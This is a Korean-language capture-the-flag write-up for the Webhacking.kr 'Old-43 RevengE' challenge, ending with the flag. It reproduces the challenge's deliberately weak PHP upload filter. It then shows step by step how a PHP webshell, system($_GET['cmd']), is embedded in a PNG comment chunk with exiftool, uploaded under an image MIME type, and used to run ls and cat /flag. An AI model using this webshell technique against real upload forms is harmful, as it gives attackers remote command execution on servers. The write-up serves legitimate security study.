Old-43 RevengE😈 Write-up

[Solved in under 58 minutes]

계속 꾸준히 퇴근하고도 공부해야한다..
잘 하는 사람들이 너무 많아서 더욱 열심히 해야한다....

모든 직장인들 화이팅!

가보자

<html>
<head>
<title>Challenge 43 RevengE</title>
</head>
<body>
<hr>
You must upload webshell and cat <b>/flag</b>
<hr>
<?php
  if(isset($_FILES['file'])){
    $type = $_FILES['file']['type'];
    $name = $_FILES['file']['name'];
    if(!$type) { exit("type not detected"); }
    if(preg_match("/\.\.|\/|\\\|\.htaccess/",$name)) exit("dont do that");
    if(preg_match("/text\/|application\/octet-stream/i",$type)) exit("wrong type");
    $image = new Imagick();
    $image->readImage($_FILES['file']['tmp_name']);
    $image->resizeImage(500, 500, imagick::FILTER_GAUSSIAN, 10);
    $image->writeImage("./upload/".$name);
    echo "Done!<br><br><a href=./upload/{$name}>./upload/{$name}</a>";
  }
?>
<form method=post enctype="multipart/form-data" action=index.php>
<input name=file type=file><input type=submit>
</form>
<hr><?php highlight_file(__FILE__); ?>
</body>
</html>

일단은 누가봐도 파일 업로드 취약점이다 그리고 코드를 바로 보여준다.

코드를 간단하게 해석하면 ../, \, .htaccess 는 필터링에 걸리고 추가로 MIME타입이 application, octet-stream, text 이면 걸린다

그리고 밑에 $image로 파일을 읽고 쓰는? 그런거라 생각한다. 솔직히 잘 모르겠다.

여기서 중요한 점은 .php 확장자는 필터링을 하지 않는다는 것

일단 해보자

그냥 아무 php파일을 올려봤는데 역시나 안됐다 아무래도 MIME 타입이 application/text etc.. 이런걸로 들어갔을거라고 예상이된다

그리하여 다른 테스트도 진행했다

MIME 타입을 image/png로 바꿔주고 png의 매직넘버까지 넣어 줬는데

접속하니 404가 뜬다

여기서부터 맨땅에 헤딩을 조금 여러번 하다가 훌륭한 것을 발견했다.

이미지에는 청크라고 유효한 데이터들이 블록단위로 있는것이 있다.

아무래도 그 부분 이외에는 취급을 안한다고 한다.

그래서 툴을 알아보다가 exiftool 라는 것을 발견했다.
원하는 명령어를 유효한 메타데이터 청크 안에 삽입이 가능하다고 해서 바로 해 봤다.

약간 스테가노그래피를 할 수 있을 것만 같다. 해보고 싶다..

anyway

해보자

convert -size 1x1 xc:white aa.png

이미지를 하나 생성해주고

exiftool -PNG:Comment='<?php system($_GET["cmd"]); ?>' -overwrite_original aa.png

이미지 청크안에 <\?php system($_GET["cmd"]); ?> 코드 삽입해주면

잘 들어간 것을 알 수 있다.

MIME 타입을 이미지로 바꿔주니

필터링에 걸리지도 않고 잘 들어갔다!

?cmd=ls

명령어가 잘 먹히는 것을 볼 수 있다.
명령어가 청크안 중간? 쯤에 위치하다보니 앞뒤로 이미지의 데이터들이 보이지만 신경안써도 된다.

flag는 /flag 경로에 있다고 하니

?cmd=cat /flag

넣어주니 바로 잘 보인다..

이거 이렇게 쉽게 푸는거 맞나 싶다.

ㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡ 답 ㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡ

FLAG{thank_you_q-roland}

ㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡ

야~호!!!! 150점!!! 근데 개인적으로 150점 급인 느낌이 별로 안듭니다..
삽질한거 생각해도 50점..? 내가 이 문제의 핵심원리를 잘 몰라서 그런걸수도..!?
뭐 어때 재밌으면 됐지

Webhacking.kr Old-43 RevengE😈 Write-up

이상 보고 끝!